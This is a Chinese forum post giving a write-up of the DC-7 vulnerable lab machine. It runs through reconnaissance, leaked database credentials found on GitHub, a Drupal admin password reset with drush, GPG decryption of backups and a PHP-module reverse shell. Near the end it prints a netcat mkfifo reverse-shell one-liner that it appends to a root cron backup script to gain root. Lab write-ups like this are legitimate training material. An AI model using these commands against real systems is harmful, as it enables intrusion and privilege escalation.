安全矩阵

 找回密码
 立即注册
搜索
查看: 2647|回复: 0

DC7

[复制链接]

63

主题

125

帖子

457

积分

中级会员

Rank: 3Rank: 3

积分
457
发表于 2021-11-3 16:18:21 | 显示全部楼层 |阅读模式
DC7




arp -scan l

nmap -sV -A -T4 -p- 192.168.0.126
开了22,80和robots.txt

打开看看
Drupal的cms
看一下robot禁了啥


一个个目录看了下,没啥用
看看大佬的复现
去duckduckgo搜索了一下@DC7USER,发现推特有个账户
他的github里面的Dc7User库存放一套源码


找了半天里面的config.php配置存放了一个用户信息,不妨用来登录一下
<?php  $servername = "localhost";  $username = "dc7user";  $password = "MdR3xOgB7#dW";  $dbname = "Staff";  $conn = mysqli_connect($servername, $username, $password, $dbname);?>
duckduckgo
Duck Duck Go是一个互联网搜寻引擎,其总部位于美国宾州Valley Forge市。
这个账号密码可以用于ssh登录

ok
来到网站目录下可以看到很多文件被权限限制更改了,这是时候不妨使用专门来管理Drupal站点的工具drush进行管理员密码新编
drush user-password someuser --password="correct horse battery staple"

someuesr报错
改一下命令
drush user-password admin --password="root"

看到有封右键
进去看看
From root@dc-7 Mon Nov 01 01:15:45 2021Return-path: <root@dc-7>Envelope-to: root@dc-7Delivery-date: Mon, 01 Nov 2021 01:15:45 +1000Received: from root by dc-7 with local (Exim 4.89)        (envelope-from <root@dc-7>)        id 1mhCYP-0000KJ-Jy        for root@dc-7; Mon, 01 Nov 2021 01:15:25 +1000From: root@dc-7 (Cron Daemon)To: root@dc-7Subject: Cron <root@dc-7> /opt/scripts/backups.shMIME-Version: 1.0Content-Type: text/plain; charset=UTF-8Content-Transfer-Encoding: 8bitX-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>X-Cron-Env: <SHELL=/bin/sh>X-Cron-Env: <HOME=/root>X-Cron-Env: <LOGNAME=root>Message-Id: <E1mhCYP-0000KJ-Jy@dc-7>Date: Mon, 01 Nov 2021 01:15:25 +1000
Database dump saved to /home/dc7user/backups/website.sql               [success]
是个计划自动备份数据库的任务,调用的是/opt/scripts/backups.sh脚本,但是没有权限去动它,只能看
用刚才改好的admin:root登录

继续看一下ssh内其它内容

------------------------------------------------------------------------------------------------------------------------------------
gpg为加密文件
大佬的走错思路,但是也值得学习

其中的主要信息有:
Shell脚本文件 /opt/scripts/backups.sh
数据库文件:/home/dc7user/backups/website.sql
网站数据: /home/dc7user/backups/website.tar.gz
从目前情况来看,website.sql和website.tar.gz文件现在都是加密过的,现在只能把目光放在另一个文件backups.sh上
查看文件如下

顺利找到了加密的秘钥,只是解密需要root权限才可以
接下来看看能找到提权的有关提示不,find查找如下(熟悉的exim映入眼帘)

7 exim提权 查看exim版本


Kali上查找方法

找到46996.sh文件传输到DC-7上


传输完成
修改文件替换结束符

执行此提权脚本,并没有提权成功
使用gpg秘钥解密PickYourOwnPassword(backup.sh中找到)


查看解密后的文件


文件夹html为website.tar.gz后解压后的文件
在文件夹中/sites/default目录下找到setting.php文件并没找到有用的信息。
只能将目光重新放到website.sql文件中,dc7user这个用户不能登录mysql数据库,所有把website.sql文件导出来后再导入自己的虚拟机中,在数据库中使用source /路径/website.sql如下
打开的文件有以下表


发现users表,查看users表并没发现user相关用户信息
难道不是考察gpg加解密和数据库文件还原吗
-----------------------------------------------------------------------------------------------------------------------------
回到后台

没有添加php的模块,自己手动加一个php模块


ok
反弹shell


ok
接下来和DC-7一样 提权
python -c 'import pty;pty.spawn("/bin/bash")'打开shell交互
回想之前的backups.sh脚本只有这个和root可以修改,现在把反弹shell代码加到backups.sh当中,然后所反弹回来的shell也是root
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.105 8888 >/tmp/f” >> /opt/scripts/backup.sh

权限不够植入?
写个shell进去看看
蚁剑链接 改/opt/scripts/backup.sh添加rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.105 8888 >/tmp/f
ok

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 21:46 , Processed in 0.014444 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表